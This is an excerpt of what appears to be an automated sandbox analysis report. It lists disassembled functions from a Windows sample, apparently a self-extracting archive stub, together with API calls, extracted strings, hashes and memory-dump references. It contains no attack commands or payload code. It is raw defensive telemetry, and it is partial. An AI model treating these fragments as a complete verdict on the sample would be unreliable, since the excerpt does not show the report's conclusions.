                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                  • API String ID: 667068680-1718035505
                                                                  • Opcode ID: fedf95444448e1229da0d48f43671c544a93ac93122bad900a39ba9d33d31667
                                                                  • Instruction ID: cf61d97d4ec992a4e9ec2023a00750409dc3d661adde54c0c41bcbd012815b41
                                                                  • Opcode Fuzzy Hash: fedf95444448e1229da0d48f43671c544a93ac93122bad900a39ba9d33d31667
                                                                  • Instruction Fuzzy Hash: 3CF0C2397802229B4B225E6ADC946AB26D86A357453A0093BD901D3314FB1CCC556B9F
                                                                  Function 00478900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0047891E
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 00478930
                                                                  • _free.LIBCMT ref: 00478943
                                                                  • _free.LIBCMT ref: 00478954
                                                                  • _free.LIBCMT ref: 00478965
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID: pH
                                                                  • API String ID: 776569668-1451419334
                                                                  • Opcode ID: 9e419aa64d9b0cf559226d4d621f1f4ecfa28ab6a12de64db0e81d563c496348
                                                                  • Instruction ID: 402658f0ec3e8bbb80a9a4be95155cab9b8e21eb911c9dadbd6def7da61f48ef
                                                                  • Opcode Fuzzy Hash: 9e419aa64d9b0cf559226d4d621f1f4ecfa28ab6a12de64db0e81d563c496348
                                                                  • Instruction Fuzzy Hash: E2F030B18501168F861A7F16FE054593BA1FB25724300576FF118962B1CBB949459B8D
                                                                  Function 0046146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 004614C2
                                                                    • Part of subcall function 0045B146: GetVersionExW.KERNEL32(?), ref: 0045B16B
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004614E6
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00461500
                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00461513
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461523
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00461533
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                  • String ID:
                                                                  • API String ID: 2092733347-0
                                                                  • Opcode ID: 1ebe05884ca0b7019780e891dc315ce08c5079df9917370b61c3d01971dd8df3
                                                                  • Instruction ID: 9349242728214839dc3ac10208e437bec8973179ae748d44d66f9f42a6a6bc3b
                                                                  • Opcode Fuzzy Hash: 1ebe05884ca0b7019780e891dc315ce08c5079df9917370b61c3d01971dd8df3
                                                                  • Instruction Fuzzy Hash: 9631F775108355ABC700DFA8C88499BB7E8BF98B54F044A2EF995C3210E734D509CBAA
                                                                  Function 00472AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00472AF1,004702FC,0046FA34), ref: 00472B08
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00472B16
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00472B2F
                                                                  • SetLastError.KERNEL32(00000000,00472AF1,004702FC,0046FA34), ref: 00472B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 6c4ecb48445ed91932df792687a845e2e527dbe10dec63a67c18c6e272b5a907
                                                                  • Instruction ID: 815179a619f58a50895266c9cbefe8642fe4b5e8f0febb1d86eb1b15023d4fe8
                                                                  • Opcode Fuzzy Hash: 6c4ecb48445ed91932df792687a845e2e527dbe10dec63a67c18c6e272b5a907
                                                                  • Instruction Fuzzy Hash: EB0128322083112EA6242F767D459DB2B48EB02B79B208B3FF018452E4EF99AC00624C
                                                                  Function 004797E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00491030,00474674,00491030,?,?,00473F73,00000050,?,00491030,00000200), ref: 004797E9
                                                                  • _free.LIBCMT ref: 0047981C
                                                                  • _free.LIBCMT ref: 00479844
                                                                  • SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 00479851
                                                                  • SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 0047985D
                                                                  • _abort.LIBCMT ref: 00479863
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: c5fad185185a4895ab084da2ac5e4847ba5d85a52de5bef775e47b2f144f0cfa
                                                                  • Instruction ID: b5127945728908d75795166a2acb0c407c814b1b7f33d6dde0a8d020b72607fb
                                                                  • Opcode Fuzzy Hash: c5fad185185a4895ab084da2ac5e4847ba5d85a52de5bef775e47b2f144f0cfa
                                                                  • Instruction Fuzzy Hash: BEF0F93519060166C75137266C09BDF1A658FD3B79F36853FF51CA6292FE2C8C06426E
                                                                  Function 0046DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0046DC47
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046DC61
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046DC72
                                                                  • TranslateMessage.USER32(?), ref: 0046DC7C
                                                                  • DispatchMessageW.USER32(?), ref: 0046DC86
                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0046DC91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 2148572870-0
                                                                  • Opcode ID: 8754194188d7e94c436b205bcb89b3bbf83385f6642ee653e4b11c638958a5c9
                                                                  • Instruction ID: 26322f50f4321460e745249e71f49c1e31367dcdf761ab1957ced243a6a70f1b
                                                                  • Opcode Fuzzy Hash: 8754194188d7e94c436b205bcb89b3bbf83385f6642ee653e4b11c638958a5c9
                                                                  • Instruction Fuzzy Hash: 86F03C72E01219BBCB206FA6DC4CDCF7F6DEF42792B004521B50AE2054E6789646C7A5
                                                                  Function 0046A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0046A699: GetDC.USER32(00000000), ref: 0046A69D
                                                                    • Part of subcall function 0046A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0046A6A8
                                                                    • Part of subcall function 0046A699: ReleaseDC.USER32(00000000,00000000), ref: 0046A6B3
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0046A83C
                                                                    • Part of subcall function 0046AAC9: GetDC.USER32(00000000), ref: 0046AAD2
                                                                    • Part of subcall function 0046AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0046AB01
                                                                    • Part of subcall function 0046AAC9: ReleaseDC.USER32(00000000,?), ref: 0046AB99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectRelease$CapsDevice
                                                                  • String ID: "F$($AF
                                                                  • API String ID: 1061551593-179185017
                                                                  • Opcode ID: 3d8b20a9243d1d418164e4ff87e1a9e0bd92fb0032c1136fc719d7771f42369c
                                                                  • Instruction ID: 527b6c7a7a4d2fe8de9af49324cc47b9c0bc2c3d0a43d9600cc28aa2725a3f9c
                                                                  • Opcode Fuzzy Hash: 3d8b20a9243d1d418164e4ff87e1a9e0bd92fb0032c1136fc719d7771f42369c
                                                                  • Instruction Fuzzy Hash: DD91EF71608750AFD610DF65C884A2BBBE8FFC9701F00496EF59AD3220DB34A906CF66
                                                                  Function 0045C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
                                                                    • Part of subcall function 0045B92D: _wcsrchr.LIBVCRUNTIME ref: 0045B944
                                                                  • _wcslen.LIBCMT ref: 0045C197
                                                                  • _wcslen.LIBCMT ref: 0045C1DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcsrchr
                                                                  • String ID: .exe$.rar$.sfx
                                                                  • API String ID: 3513545583-31770016
                                                                  • Opcode ID: e684ee430c050c3eee9839c62fafe6ed6f678b40fe9818544e9caa2465504ba4
                                                                  • Instruction ID: ed39bd38e41d6d95225a248d13de3f4004fd9480b213632090b10e4e111698bf
                                                                  • Opcode Fuzzy Hash: e684ee430c050c3eee9839c62fafe6ed6f678b40fe9818544e9caa2465504ba4
                                                                  • Instruction Fuzzy Hash: 4641F92554071199C731AF648892A7F73A4EF41B4AF14494FFD826B2C3EB5C4D8AC39E
                                                                  Function 0045BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 0045BB27
                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0045A275,?,?,00000800,?,0045A23A,?,0045755C), ref: 0045BBC5
                                                                  • _wcslen.LIBCMT ref: 0045BC3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CurrentDirectory
                                                                  • String ID: UNC$\\?\
                                                                  • API String ID: 3341907918-253988292
                                                                  • Opcode ID: 6dba796ecc80d6a1a07d8bebd41174734af4e35b398bfbb8343707d4bcf58799
                                                                  • Instruction ID: b1e48187d907088b53c1a2304adc973f8774ccb596657c753a4c9f5b6a549522
                                                                  • Opcode Fuzzy Hash: 6dba796ecc80d6a1a07d8bebd41174734af4e35b398bfbb8343707d4bcf58799
                                                                  • Instruction Fuzzy Hash: E941A331400215A6DB22AF21CC02EEF7768EF41356F10446FFD55A3252EB78AE988B9D
                                                                  Function 0046CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcschr.LIBVCRUNTIME ref: 0046CD84
                                                                    • Part of subcall function 0046AF98: _wcschr.LIBVCRUNTIME ref: 0046B033
                                                                    • Part of subcall function 00461FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0045C116,00000000,.exe,?,?,00000800,?,?,?,00468E3C), ref: 00461FD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr$CompareString
                                                                  • String ID: <$HIDE$MAX$MIN
                                                                  • API String ID: 69343711-3358265660
                                                                  • Opcode ID: 7ec97e8b3107d0fc7c1305b386cba1f6ec711c437a9d64b96c195750c721f065
                                                                  • Instruction ID: 8673bdb9d1767c08218280c38934cc9a1a708029a295aff40ea210eaccf0b074
                                                                  • Opcode Fuzzy Hash: 7ec97e8b3107d0fc7c1305b386cba1f6ec711c437a9d64b96c195750c721f065
                                                                  • Instruction Fuzzy Hash: E1319571A002099ADF25DB51CC85EEF73BCEB14354F008567E905E7280FBB88A848F9A
                                                                  Function 0046AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0046AAD2
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0046AB01
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0046AB99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectRelease
                                                                  • String ID: -F$7F
                                                                  • API String ID: 1429681911-476403228
                                                                  • Opcode ID: 17da887a813d0f7f72c387e54cee124f23fa1b92f9c3cf580d51d79c328dd4bf
                                                                  • Instruction ID: 09d35b1629c41f2719024e9b186b5b9ee49f1964cefad57b1349273f853e8aed
                                                                  • Opcode Fuzzy Hash: 17da887a813d0f7f72c387e54cee124f23fa1b92f9c3cf580d51d79c328dd4bf
                                                                  • Instruction Fuzzy Hash: D221FA72108304AFD301AFA6DC88E6FBFE9FF89356F050929FA4592124D7319A548B66
                                                                  Function 0045B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 0045B9B8
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • _wcschr.LIBVCRUNTIME ref: 0045B9D6
                                                                  • _wcschr.LIBVCRUNTIME ref: 0045B9E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                  • String ID: %c:\
                                                                  • API String ID: 525462905-3142399695
                                                                  • Opcode ID: 56404035c02221d8a4fa0abe07827629002ccd8dce23069e6aee4296c9222195
                                                                  • Instruction ID: 8a7a3ae8d6ef4eb50ebb5d448ae8bab54ece381a07feea4d4992068565ae27d4
                                                                  • Opcode Fuzzy Hash: 56404035c02221d8a4fa0abe07827629002ccd8dce23069e6aee4296c9222195
                                                                  • Instruction Fuzzy Hash: 5101F96350031165D631AB769C41DBBA79CDF91775B50840FF944D7283EB28D84883F9
                                                                  Function 0046B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046B2BE
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0046B2D6
                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0046B304
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: GETPASSWORD1$xzJ
                                                                  • API String ID: 445417207-2247322485
                                                                  • Opcode ID: c9088e5f7b15d8bf5418bc4b8db5fcbfadb406cc3dc986986a67dce2b63c81ae
                                                                  • Instruction ID: 8b33cee9cccef12284076cbe0a2e8af0741397f1a3a43997b18591130312f62b
                                                                  • Opcode Fuzzy Hash: c9088e5f7b15d8bf5418bc4b8db5fcbfadb406cc3dc986986a67dce2b63c81ae
                                                                  • Instruction Fuzzy Hash: 15110832A40114B7DB219E659C5DFFF376CEF1A705F100062FE45F2280E7A8998587AB
                                                                  Function 0046B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadBitmapW.USER32(00000065), ref: 0046B6ED
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0046B712
                                                                  • DeleteObject.GDI32(00000000), ref: 0046B744
                                                                  • DeleteObject.GDI32(00000000), ref: 0046B767
                                                                    • Part of subcall function 0046A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0046B73D,00000066), ref: 0046A6D5
                                                                    • Part of subcall function 0046A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A6EC
                                                                    • Part of subcall function 0046A6C2: LoadResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A703
                                                                    • Part of subcall function 0046A6C2: LockResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A712
                                                                    • Part of subcall function 0046A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0046B73D,00000066), ref: 0046A72D
                                                                    • Part of subcall function 0046A6C2: GlobalLock.KERNEL32(00000000), ref: 0046A73E
                                                                    • Part of subcall function 0046A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0046A762
                                                                    • Part of subcall function 0046A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0046A7A7
                                                                    • Part of subcall function 0046A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0046A7C6
                                                                    • Part of subcall function 0046A6C2: GlobalFree.KERNEL32(00000000), ref: 0046A7CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                  • String ID: ]
                                                                  • API String ID: 1797374341-3352871620
                                                                  • Opcode ID: 1c5465d2c9dfb1583c91a083879dad4e14ce741a2b73abbff737f73f7dcfbe83
